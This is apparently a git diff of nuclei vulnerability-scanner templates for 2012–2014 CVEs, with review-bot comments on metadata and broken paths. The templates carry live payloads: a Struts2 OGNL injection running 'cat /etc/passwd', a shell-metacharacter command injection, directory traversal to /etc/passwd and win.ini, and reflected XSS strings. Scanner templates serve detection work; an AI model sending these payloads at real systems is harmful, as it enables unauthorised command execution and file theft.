'{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2012/cve-2012-4940.yaml b/nuclei-templates/CVE-2012/cve-2012-4940.yaml new file mode 100644 index 0000000000..6e9ed3f4d9 --- /dev/null +++ b/nuclei-templates/CVE-2012/cve-2012-4940.yaml 
@@ -0,0 +1,25 @@
+id: CVE-2012-4940
+
+info:
+ name: Axigen Mail Server - 'Filename' Directory Traversal
+ author: dhiyaneshDk
+ severity: high
+ description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in (1) the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in (2) an edit action or (3) a delete action to the default URI.
+ reference: https://www.exploit-db.com/exploits/37996
+ tags: cve,cve2012,axigen,lfi,mail
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini'
+ - '{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini'
+
+ stop-at-first-match: true
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "bit app support"
+ - "fonts"
+ - "extensions"
+ condition: and
diff --git a/nuclei-templates/CVE-2012/CVE-2012-5913.yaml b/nuclei-templates/CVE-2012/cve-2012-5913.yaml
similarity index 100%
rename from nuclei-templates/CVE-2012/CVE-2012-5913.yaml
rename to nuclei-templates/CVE-2012/cve-2012-5913.yaml
diff --git a/nuclei-templates/CVE-2013/CVE-2013-1965.yaml b/nuclei-templates/CVE-2013/CVE-2013-1965.yaml
deleted file mode 100644
index c5610c6070..0000000000
--- a/nuclei-templates/CVE-2013/CVE-2013-1965.yaml
+++ /dev/null
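Review bot: Both paths in `cve-2012-4940.yaml` carry a fixed `h=44ea8a6603cbf54e245f37b4ddaf8f36` query value with nothing saying what it is; it looks like a per-session handle copied from the referenced PoC, in which case it is not valid on any other instance and the check silently never matches. Either document where it comes from (`# h: <session handle - TODO confirm how it is obtained>`) or derive it from an earlier request. The `..\..\..\windows\win.ini` target and the three win.ini strings also cover Windows installs only, so a Linux host produces no result for this CVE; that limitation belongs in the description.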
@@ -1,32 +0,0 @@ -id: CVE-2013-1965 -info: - name: Apache Struts2 S2-012 RCE - author: pikpikcu - severity: critical - description: Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect. - reference: - - http://struts.apache.org/development/2.x/docs/s2-012.html - - https://nvd.nist.gov/vuln/detail/CVE-2013-1965 - - https://bugzilla.redhat.com/show_bug.cgi?id=967655 - remediation: Developers should immediately upgrade to Struts 2.3.14.3 or later. - classification: - cve-id: CVE-2013-1965 - tags: cve,cve2013,apache,rce,struts,ognl -requests: - - method: POST - path: - - "{{BaseURL}}/user.action" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2013/CVE-2013-2248.yaml b/nuclei-templates/CVE-2013/CVE-2013-2248.yaml deleted file mode 100644 index 34b38eeb71..0000000000 --- a/nuclei-templates/CVE-2013/CVE-2013-2248.yaml +++ /dev/null 
@@ -1,21 +0,0 @@ -id: CVE-2013-2248 - -info: - name: Apache Struts CVE-2013-2248 Multiple Open Redirection Vulnerabilities - author: 0x_Akoko - description: Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input. - reference: https://www.exploit-db.com/exploits/38666 - severity: low - tags: apache,redirect - -requests: - - method: GET - path: - - "{{BaseURL}}/struts2-showcase/fileupload/upload.action?redirect:http://www.example.com/" - - "{{BaseURL}}/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.example.com/%23" - - matchers: - - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - part: header diff --git a/nuclei-templates/CVE-2013/cve-2013-2251.yaml b/nuclei-templates/CVE-2013/CVE-2013-2251.yaml similarity index 100% rename from nuclei-templates/CVE-2013/cve-2013-2251.yaml rename to nuclei-templates/CVE-2013/CVE-2013-2251.yaml diff --git a/nuclei-templates/CVE-2013/CVE-2013-2287.yaml b/nuclei-templates/CVE-2013/CVE-2013-2287.yaml deleted file mode 100644 index ba2fd89ed6..0000000000 --- a/nuclei-templates/CVE-2013/CVE-2013-2287.yaml +++ /dev/null 
@@ -1,32 +0,0 @@ -id: CVE-2013-2287 -info: - name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting - author: daffainfo - severity: medium - description: Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2013-2287 - - http://osvdb.org/90840 - - https://www.dognaedis.com/vulns/DGS-SEC-16.html - classification: - cve-id: CVE-2013-2287 - tags: cve,cve2013,wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2013/CVE-2013-2621.yaml b/nuclei-templates/CVE-2013/CVE-2013-2621.yaml index 4ab45fe9c9..788605c50a 100644 --- a/nuclei-templates/CVE-2013/CVE-2013-2621.yaml +++ b/nuclei-templates/CVE-2013/CVE-2013-2621.yaml @@ -1,10 +1,15 @@ id: CVE-2013-2621 + info: name: Telaen => v1.3.1 - Open Redirect author: ctflearner severity: medium description: | Open Redirection Vulnerability in the redir.php script in Telaen before 1.3.1 allows remote attackers to redirect victims to arbitrary websites via a crafted URL. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. + remediation: | + Upgrade to the latest version of Telaen to fix the open redirect vulnerability. reference: - https://www.exploit-db.com/exploits/38546 - https://exchange.xforce.ibmcloud.com/vulnerabilities/84683 
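Review bot: The added `remediation` in `CVE-2013-2621.yaml` says only "Upgrade to the latest version of Telaen", while the description two lines above pins the affected range as "before 1.3.1"; name the fixed version so the two agree, `Upgrade to Telaen 1.3.1 or later.`. The context line `name: Telaen => v1.3.1 - Open Redirect` reads as "1.3.1 and above", which contradicts the same description, but that line predates this change. The `info:` block continues in the next hunk.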
@@ -14,8 +19,14 @@ info: cvss-score: 6.1 cve-id: CVE-2013-2621 cwe-id: CWE-601 + epss-score: 0.03563 + epss-percentile: 0.90674 cpe: cpe:2.3:a:telaen_project:telaen:*:*:*:*:*:*:*:* - tags: cve,cve2012,telaen,redirect + metadata: + max-request: 2 + vendor: telaen_project + product: telaen + tags: cve2013,cve,telaen,redirect,telaen_project http: - method: GET @@ -24,9 +35,11 @@ http: - "{{BaseURL}}/redir.php?https://interact.sh" stop-at-first-match: true + matchers-condition: and matchers: - type: regex part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' +# digest: 4a0a00473045022047d42b34a035b4f67b78f16f771a7b48591281e968fc8d1650ad9b7808049305022100e564b5514038061f581a413e252920c2f837099327c21c6c6dda604704f18731:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2013/cve-2013-3827.yaml b/nuclei-templates/CVE-2013/CVE-2013-3827.yaml similarity index 100% rename from nuclei-templates/CVE-2013/cve-2013-3827.yaml rename to nuclei-templates/CVE-2013/CVE-2013-3827.yaml diff --git a/nuclei-templates/CVE-2013/CVE-2013-4117.yaml b/nuclei-templates/CVE-2013/CVE-2013-4117.yaml deleted file mode 100644 index 15c20005ab..0000000000 --- a/nuclei-templates/CVE-2013/CVE-2013-4117.yaml +++ /dev/null 
@@ -1,32 +0,0 @@ -id: CVE-2013-4117 -info: - name: WordPress Plugin Category Grid View Gallery 2.3.1 - Reflected Cross-Site Scripting - author: daffainfo - severity: medium - description: A cross-site scripting vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2013-4117 - - http://openwall.com/lists/oss-security/2013/07/11/11 - - http://seclists.org/bugtraq/2013/Jul/17 - classification: - cve-id: CVE-2013-4117 - tags: cve,cve2013,wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/23 diff --git a/nuclei-templates/CVE-2013/CVE-2013-6281.yaml b/nuclei-templates/CVE-2013/CVE-2013-6281.yaml new file mode 100644 index 0000000000..d08cfdb755 --- /dev/null +++ b/nuclei-templates/CVE-2013/CVE-2013-6281.yaml 
@@ -0,0 +1,41 @@
+id: CVE-2013-6281
+info:
+ name: WordPress Spreadsheet - dhtmlxspreadsheet Plugin Reflected XSS
+ author: random-robbie
+ severity: medium
+ description: |
+ The dhtmlxspreadsheet WordPress plugin was affected by a /dhtmlxspreadsheet/codebase/spreadsheet.php page Parameter Reflected XSS security vulnerability.
+ reference:
+ - https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf
+ - http://web.archive.org/web/20210213174519/https://www.securityfocus.com/bid/63256/
+ - https://wordpress.org/plugins/dhtmlxspreadsheet/
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2013-6281
+ cwe-id: CWE-79
+ metadata:
+ google-dork: inurl:/wp-content/plugins/dhtmlxspreadsheet
+ verified: "true"
+ tags: cve,cve2013,wordpress,xss,wp-plugin,wp
+requests:
+ - raw:
+ - |
+ GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
+ Host: {{Hostname}}
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "page: ''"
+ - "dhx_rel_path"
+ condition: and
+ - type: word
+ part: header
+ words:
+ - text/html
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2013/CVE-2013-7285.yaml b/nuclei-templates/CVE-2013/CVE-2013-7285.yaml
index 0b4db23e10..424bb0c43a 100644
--- a/nuclei-templates/CVE-2013/CVE-2013-7285.yaml
+++ b/nuclei-templates/CVE-2013/CVE-2013-7285.yaml
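Review bot: `CVE-2013/CVE-2013-6281.yaml` is added here while `CVE-2013/cve-2013-6281.yaml` is deleted later in the patch, and the new copy is the poorer one: it drops the `https://nvd.nist.gov/vuln/detail/CVE-2013-6281` reference and the `wpscan` tag, and renames the metadata key `google-query` to `google-dork`. The request and matchers are the same in both files, so if the intent is only a filename case change, a rename (as done for `cve-2013-2251.yaml`) keeps the content intact; otherwise carry the dropped reference over. Whether `google-dork` is the key the rest of the tree uses cannot be seen from this patch — check before keeping the rename.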
@@ -6,6 +6,10 @@ info: severity: critical description: | Xstream API before 1.4.6 and 1.4.10 is susceptible to remote code execution. If the security framework has not been initialized, an attacker can run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format. This can allow an attacker to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. + remediation: | + Upgrade XStream to version 1.4.10 or later to mitigate this vulnerability. reference: - https://x-stream.github.io/CVE-2013-7285.html - https://www.mail-archive.com/user@xstream.codehaus.org/msg00607.html @@ -17,13 +21,14 @@ info: cvss-score: 9.8 cve-id: CVE-2013-7285 cwe-id: CWE-78 - epss-score: 0.33561 + epss-score: 0.55716 + epss-percentile: 0.97607 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project product: xstream - tags: cve,cve2013,xstream,deserialization,rce + tags: cve2013,cve,xstream,deserialization,rce,oast,xstream_project http: - raw: @@ -59,3 +64,4 @@ http: part: interactsh_request words: - "User-Agent: curl" +# digest: 4b0a00483046022100ed54d64a6a5d98f883eec6e0dc9bf3fb76b87372f2f242bcad697a3e8b0ada2d022100adb7292dab8008a25c2e9765555bc1f1eacac15af2ca9d04af09f6e758fd78ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2013/cve-2013-1965.yaml b/nuclei-templates/CVE-2013/cve-2013-1965.yaml new file mode 100644 index 0000000000..b6b996e988 --- /dev/null +++ b/nuclei-templates/CVE-2013/cve-2013-1965.yaml 
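Review bot: The added `remediation` in `CVE-2013-7285.yaml` names 1.4.10 as the fixed version, but the description directly above lists "before 1.4.6 and 1.4.10" as susceptible, so the two lines contradict each other on whether 1.4.10 is safe. Confirm the fixed release against the `x-stream.github.io/CVE-2013-7285.html` reference and name that release in the remediation instead, or say that the security framework must be initialized on affected releases, which is what the description already describes. The `info:` block continues in the next hunk.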
@@ -0,0 +1,29 @@
+id: CVE-2013-1965
+
+info:
+ name: Apache Struts2 S2-012 RCE
+ author: pikpikcu
+ severity: critical
+ description: Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
+ reference: http://struts.apache.org/development/2.x/docs/s2-012.html
+ tags: cve,cve2013,apache,rce,struts,ognl
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/user.action"
+ headers:
+ Content-Type: application/x-www-form-urlencoded
+ body: |
+ name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2013/cve-2013-2248.yaml b/nuclei-templates/CVE-2013/cve-2013-2248.yaml
new file mode 100644
index 0000000000..eca8e3d253
--- /dev/null
+++ b/nuclei-templates/CVE-2013/cve-2013-2248.yaml
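Review bot: `cve-2013-1965.yaml` re-adds the template this patch deletes as `CVE-2013-1965.yaml`, but with less metadata: the `remediation`, the `classification`/`cve-id` block and the NVD and Red Hat references are gone, and the passwd regex loses its trailing colon (`root:.*:0:0`). Nothing in the request or matcher logic changes, so the net effect is a lossy case-rename; keep the deleted file's `info` block, or do a plain rename as the patch does for other files. The same pattern applies to `cve-2013-2287.yaml` and `cve-2013-4117.yaml`, and in place to `CVE-2014-10037.yaml` and `CVE-2014-8799.yaml`, whose hunks strip the `classification` block and NVD references while keeping `severity: high`.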
@@ -0,0 +1,20 @@
+id: CVE-2013-2248
+
+info:
+ name: Apache Struts - Multiple Open Redirection Vulnerabilities
+ author: 0x_Akoko
+ description: Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
+ reference: https://www.exploit-db.com/exploits/38666
+ severity: low
+ tags: cve,cve2013,apache,redirect,struts
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.action?redirect:http://www.example.com/"
+
+ matchers:
+ - type: regex
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ part: header
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2013/cve-2013-2287.yaml b/nuclei-templates/CVE-2013/cve-2013-2287.yaml
new file mode 100644
index 0000000000..4b827a6e88
--- /dev/null
+++ b/nuclei-templates/CVE-2013/cve-2013-2287.yaml
@@ -0,0 +1,30 @@
+id: CVE-2013-2287
+
+info:
+ name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2013-2287
+ tags: cve,cve2013,wordpress,xss,wp-plugin
+ description: "Multiple cross-site scripting (XSS) vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter."
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2013/cve-2013-4117.yaml b/nuclei-templates/CVE-2013/cve-2013-4117.yaml
new file mode 100644
index 0000000000..2b2a102326
--- /dev/null
+++ b/nuclei-templates/CVE-2013/cve-2013-4117.yaml
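Review bot: `cve-2013-2248.yaml` replaces the deleted `CVE-2013-2248.yaml` with a single `/index.action?redirect:` probe, dropping the `redirectAction:` variant and the `struts2-showcase` paths the old file exercised, so the template now checks only one of the two redirect prefixes that the name ("Multiple Open Redirection") promises. Keep both prefixes under `path:` (one extra request) or narrow the name to what is checked. The file is also written without a trailing newline (`\ No newline at end of file`), unlike the other templates added in this patch; end it with a newline.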
@@ -0,0 +1,30 @@
+id: CVE-2013-4117
+
+info:
+ name: WordPress Plugin Category Grid View Gallery 2.3.1 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Cross-site scripting (XSS) vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4117
+ tags: cve,cve2013,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2013/CVE-2013-5528.yaml b/nuclei-templates/CVE-2013/cve-2013-5528.yaml
similarity index 100%
rename from nuclei-templates/CVE-2013/CVE-2013-5528.yaml
rename to nuclei-templates/CVE-2013/cve-2013-5528.yaml
diff --git a/nuclei-templates/CVE-2013/cve-2013-6281.yaml b/nuclei-templates/CVE-2013/cve-2013-6281.yaml
deleted file mode 100644
index 2f67a808c3..0000000000
--- a/nuclei-templates/CVE-2013/cve-2013-6281.yaml
+++ /dev/null
@@ -1,49 +0,0 @@ -id: CVE-2013-6281 - -info: - name: WordPress Spreadsheet - Cross-Site Scripting - author: random-robbie - severity: medium - description: | - WordPress Spreadsheet plugin contains a reflected cross-site scripting vulnerability in /dhtmlxspreadsheet/codebase/spreadsheet.php. - reference: - - https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf - - http://web.archive.org/web/20210213174519/https://www.securityfocus.com/bid/63256/ - - https://wordpress.org/plugins/dhtmlxspreadsheet/ - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281 - - https://nvd.nist.gov/vuln/detail/CVE-2013-6281 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2013-6281 - cwe-id: CWE-79 - metadata: - google-query: inurl:/wp-content/plugins/dhtmlxspreadsheet - verified: "true" - tags: wp,wpscan,cve,cve2013,wordpress,xss,wp-plugin - -requests: - - raw: - - | - GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "page: ''" - - "dhx_rel_path" - condition: and - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/12 diff --git a/nuclei-templates/CVE-2014/CVE-2014-10037.yaml b/nuclei-templates/CVE-2014/CVE-2014-10037.yaml index e47a512fbb..7acb0d68b5 100644 --- a/nuclei-templates/CVE-2014/CVE-2014-10037.yaml +++ b/nuclei-templates/CVE-2014/CVE-2014-10037.yaml 
@@ -1,28 +1,27 @@ id: CVE-2014-10037 + info: name: DomPHP 0.83 - Directory Traversal author: daffainfo severity: high - description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php. + description: Directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impact via a .. (dot dot) in the url parameter to photoalbum/index.php. reference: - https://www.exploit-db.com/exploits/30865 - https://www.cvedetails.com/cve/CVE-2014-10037 - - https://nvd.nist.gov/vuln/detail/CVE-2014-10037 - - http://osvdb.org/show/osvdb/102204 - classification: - cve-id: CVE-2014-10037 tags: cve,cve2014,lfi + requests: - method: GET path: - "{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - - 200 - -# Enhanced by mp on 2022/02/24 + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2014/CVE-2014-1203.yaml b/nuclei-templates/CVE-2014/CVE-2014-1203.yaml deleted file mode 100644 index d8e32964a8..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-1203.yaml +++ /dev/null 
@@ -1,39 +0,0 @@ -id: CVE-2014-1203 - -info: - name: Eyou E-Mail <3.6 - Remote Code Execution - author: pikpikcu - severity: critical - description: Eyou Mail System before 3.6 allows remote attackers to execute arbitrary commands via shell metacharacters in the domain parameter to admin/domain/ip_login_set/d_ip_login_get.php via the get_login_ip_config_file function. - reference: - - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g - - https://nvd.nist.gov/vuln/detail/CVE-2014-1203 - - http://seclists.org/fulldisclosure/2014/Jan/32 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2014-1203 - cwe-id: CWE-77 - tags: seclists,rce,eyou - -requests: - - raw: - - | - POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - type='|cat /etc/passwd||' - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - part: body - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/01 diff --git a/nuclei-templates/CVE-2014/cve-2014-2323.yaml b/nuclei-templates/CVE-2014/CVE-2014-2323.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-2323.yaml rename to nuclei-templates/CVE-2014/CVE-2014-2323.yaml diff --git a/nuclei-templates/CVE-2014/CVE-2014-4536.yaml b/nuclei-templates/CVE-2014/CVE-2014-4536.yaml deleted file mode 100644 index 68c79d702c..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-4536.yaml +++ /dev/null 
@@ -1,36 +0,0 @@ -id: CVE-2014-4536 -info: - name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected Cross-Site Scripting - author: daffainfo - severity: medium - description: Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter. - reference: - - https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f - - https://nvd.nist.gov/vuln/detail/CVE-2014-4536 - - http://wordpress.org/plugins/infusionsoft/changelog - - http://codevigilant.com/disclosure/wp-plugin-infusionsoft-a3-cross-site-scripting-xss - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2014-4536 - cwe-id: CWE-79 - tags: cve,cve2014,wordpress,wp-plugin,xss -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&" - matchers-condition: and - matchers: - - type: word - words: - - '">' - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2014/cve-2014-4550.yaml b/nuclei-templates/CVE-2014/CVE-2014-4550.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-4550.yaml rename to nuclei-templates/CVE-2014/CVE-2014-4550.yaml diff --git a/nuclei-templates/CVE-2014/CVE-2014-4558.yaml b/nuclei-templates/CVE-2014/CVE-2014-4558.yaml index c3ee2d4d50..74e48031ac 100644 --- a/nuclei-templates/CVE-2014/CVE-2014-4558.yaml 
+++ b/nuclei-templates/CVE-2014/CVE-2014-4558.yaml @@ -1,35 +1,37 @@ id: CVE-2014-4558 + info: - name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected Cross-Site Scripting + name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected XSS author: daffainfo severity: medium - description: A cross-site scripting vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter. - reference: + reference: | - https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301 - https://nvd.nist.gov/vuln/detail/CVE-2014-4558 - - http://codevigilant.com/disclosure/wp-plugin-swipehq-payment-gateway-woocommerce-a3-cross-site-scripting-xss + tags: cve,cve2014,wordpress,wp-plugin,xss,woocommerce classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2014-4558 cwe-id: CWE-79 - tags: cve,cve2014,wordpress,wp-plugin,xss,woocommerce + description: "Cross-site scripting (XSS) vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter." + requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E " + - "{{BaseURL}}/wp-content/plugins/swipehq–payment–gateway–woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E " + matchers-condition: and matchers: - type: word words: - "'>" part: body + - type: word part: header words: - text/html + - type: status status: - 200 - -# Enhanced by mp on 2022/02/24 
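Review bot: The rewritten path in `CVE-2014-4558.yaml` spells the plugin slug `swipehq–payment–gateway–woocommerce` with U+2013 en dashes where the removed line had ASCII hyphens, so the request targets a path that does not exist and the template can never match; restore `swipehq-payment-gateway-woocommerce`. In the same hunk `reference:` becomes `reference: |`, which turns the list of URLs into one literal-block string, and `cvss-score: 6.1` becomes `6.10`; keep the list form and the numeric score as they were. The trailing space inside the path string (`...%3C/script%3E "`) was already present but survives the rewrite and is worth trimming while the line is touched.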
